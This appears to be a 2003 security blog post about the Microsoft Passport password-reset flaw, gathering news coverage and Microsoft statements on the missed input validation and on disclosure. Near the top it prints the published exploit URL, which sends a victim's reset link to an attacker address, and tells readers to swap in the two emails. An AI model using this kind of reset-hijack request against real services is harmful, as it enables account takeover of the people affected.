Net Manager
Network Managing, Engineering and Administration with an eye toward security.

Best practices meets the real world!


Friday, May 09, 2003  

Ok, yesterday I didn't post about the Microsoft Passport security flaw... Work :)

Exploit: https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1 posted by Muhammad Faisal Rauf Danka.

You just change the victim@hotmail.com and attacker@attacker.com. Notice the emailpwdreset.srf, that's the culprit, probably shouldn't have been accessable by external servers -- configuration issue.

Here's a round up of the issue including News articles:
Silicon Valley News
Information Week
PC World
Ana Nova
cNet News.com articles here, here, and here.
MSNBC

and Quotations:

Adam Sohn Quotes:
"It was something that slipped through the reviews"
"Of course we should have caught it; we should catch every (issue)"
"We didn't validate the input," Sohn said. "We allowed somebody external to do something only the system itself
should be doing. Somebody plumbed around ... and figured out they could do this."

Simon Conant Quotes:
"It is very rare for this type of thing to happen. We don't wait for it to happen."

CBS News (and others):
"Microsoft acknowledged the flaw affected all its 200 million Passport accounts but said it fixed the problem.
early Thursday, after details were published on the Internet. Product Manager Adam Sohn said the company was
unaware of hackers actually hijacking anyone's Passport account, but several experts said they successfully
tested the procedure overnight. "

I'm still trying to find the article in which Sohn was quoted as saying that the Security Guards to the MS Complex received the email about the vulnerability. I do remember reading about 3-4 different explanations that he said as to why they didn't respond to the email. Today, all the news is the same AP quotes, so I guess someone in Redmond got their act together about what to say :).

I do agree with those folks over at SlashDot who where saying: How do you contact Microsoft?? Seems you have to know the right department, the right manager, and the right email address, otherwise your ignored. Funny, post it on a mailing list and 8 hrs later it's resolved :). No wonder MS is against public disclosure :-D.

posted by David | 5/09/2003 03:07:00 PM

0 Comments:

Post a Comment

<< Home
links
Net Manager Blog
Cockatiel Lair

cNet News
eWeek
cNet
InterNet Week
Network World
Information Week
Security Focus
SANS InfoSec Reading Room
CERT
SlashDot
GrokLaw
NewsForge
LWN.net
Linux Journal
Linux Today
Linux Gazette
The Register

Internet Storm Center
DShield
Internet Health Report
Global Instability
SamSpade DNSBLomatic
Virus Encyclopedia
Symantec Anti-Virus
TMS - Symantec
McAfee
Sophos Top Ten

Security Tracker
Hacker Toolkit
Security-Forums
PacketStorm
Phrack
Astalavista
Interhack
RootKits
Knoppix
Knoopix STD
News Links
CNN Online
MSNBC News
CBS News
ABC News
FOX News
USA Today
The Miami Herald
The Washington Post
The New York Times
BBC News
The Guardian
Canada's CBC
Austraila's ABC
Blog Links
IT Blogs
Just Another Geeks Blog
The Lost Olive
CyberCrime Archives
DataCom Guy
One Man I.T.
Geek Style
Pete's Perfect World
TechDirt
archives



contact
You can contact me at: security.networking (at) gmail.com

My Personal Home Page is: LAN Technican.

The views expressed on this site are mine alone and do not necessarily reflect the views of my employer.
Site Feed

PicoSearch

Reading blogs at work? Click to escape to a suitable site!
Get Firefox

Site Meter

Powered by Blogger